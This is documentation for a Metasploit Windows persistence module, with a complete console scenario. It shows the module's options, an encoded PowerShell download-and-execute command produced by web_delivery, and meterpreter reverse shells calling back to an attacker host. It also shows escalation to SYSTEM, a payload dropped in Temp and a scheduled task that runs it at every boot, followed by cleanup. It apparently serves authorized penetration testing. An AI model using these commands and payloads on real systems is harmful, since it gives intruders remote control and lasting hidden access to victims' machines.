## Vulnerable Application This module establishes persistence by creating a scheduled task to run a payload. ## Verification Steps 1. get session on target with admin/system privs 2. `use exploit/windows/persistence/task_scheduler` 3. `set payload ` 4. `set lport ` 5. `set lhost ` 6. `exploit` ## Options ### PAYLOAD_NAME Name of payload file to write. Random string as default. ### TASK_NAME The name of task. Random string as default. ## Advanced Options ### ScheduleType Schedule frequency for the new created task. Options are: `MINUTE`, `HOURLY`, `DAILY`, `WEEKLY`, `MONTHLY`, `ONCE`, `ONSTART`, `ONLOGON`, `ONIDLE`. ### ScheduleModifier Schedule frequency modifier to define the amount of `ScheduleType`. This defines the amount of minutes/hours/days/weeks/months, depending on the ScheduleType value. When `ONIDLE` type is used, this represents how many minutes the computer is idle before the task starts. This value is not used with `ONCE`, `ONSTART` and `ONLOGON` types. ## Scenarios ### Windows 10 1909 (10.0 Build 18363) ``` resource (/root/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/root/.msf4/msfconsole.rc)> setg lhost 2.2.2.2 lhost => 2.2.2.2 resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp payload => cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set target 2 target => 2 resource (/root/.msf4/msfconsole.rc)> set srvport 8085 srvport => 8085 resource (/root/.msf4/msfconsole.rc)> set uripath w2 uripath => w2 resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp resource (/root/.msf4/msfconsole.rc)> set lport 4449 lport => 4449 resource (/root/.msf4/msfconsole.rc)> run [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 2.2.2.2:4449 [*] Using URL: http://2.2.2.2:8085/w2 [*] Server started. [*] Run the following command on the target machine: powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABhADYAeQA3AFUAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAYQA2AHkANwBVAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAYQA2AHkANwBVAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwB0AGIARwBHAGMAVgBOAEoATgAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIAJwApACkAOwA= msf exploit(multi/script/web_delivery) > [*] 1.1.1.1 web_delivery - Powershell command length: 3659 [*] 1.1.1.1 web_delivery - Delivering Payload (3659 bytes) [*] Sending stage (230982 bytes) to 1.1.1.1 [*] Meterpreter session 1 opened (2.2.2.2:4449 -> 1.1.1.1:49934) at 2025-10-26 16:11:31 -0400 ``` Session info ``` msf exploit(multi/script/web_delivery) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : WIN10PROLICENSE OS : Windows 10 1909 (10.0 Build 18363). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > getuid Server username: WIN10PROLICENSE\windows meterpreter > background [*] Backgrounding session 1... ``` Persistence ``` msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/task_scheduler [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp msf exploit(windows/persistence/task_scheduler) > set session 1 session => 1 msf exploit(windows/persistence/task_scheduler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(windows/persistence/task_scheduler) > exploit [*] Exploit running as background job 1. [*] Exploit completed, but no session was created. [*] Started reverse TCP handler on 2.2.2.2:4444 msf exploit(windows/persistence/task_scheduler) > [*] Running automatic check ("set AutoCheck false" to disable) [*] [Task Scheduler] Trying to get SYSTEM privilege [*] [Task Scheduler] Got SYSTEM privilege [+] The target appears to be vulnerable. Likely exploitable [*] Payload (7168 bytes) uploaded on WIN10PROLICENSE to C:\Users\windows\AppData\Local\Temp\CLxSZIsj.exe [*] Creating task: svuJIW [*] [Task Scheduler] executing command: schtasks /create /tn "svuJIW" /tr "C:\Users\windows\AppData\Local\Temp\CLxSZIsj.exe" /sc ONSTART /ru SYSTEM /f [*] Starting task: svuJIW [*] [Task Scheduler] executing command: schtasks /run /tn svuJIW [*] Sending stage (188998 bytes) to 1.1.1.1 [*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251026.1226/WIN10PROLICENSE_20251026.1226.rc [*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:49935) at 2025-10-26 16:12:29 -0400 ``` Cleanup ``` msf exploit(windows/persistence/task_scheduler) > sessions -i 2 [*] Starting interaction with 2... meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251026.1226/WIN10PROLICENSE_20251026.1226.rc [*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251026.1226/WIN10PROLICENSE_20251026.1226.rc for ERB directives. resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251026.1226/WIN10PROLICENSE_20251026.1226.rc)> execute -f cmd.exe -a "/c schtasks /delete /tn svuJIW /f" Process 560 created. resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251026.1226/WIN10PROLICENSE_20251026.1226.rc)> rm C:/Users/windows/AppData/Local/Temp/CLxSZIsj.exe [-] stdapi_fs_delete_file: Operation failed: Access is denied. meterpreter > ```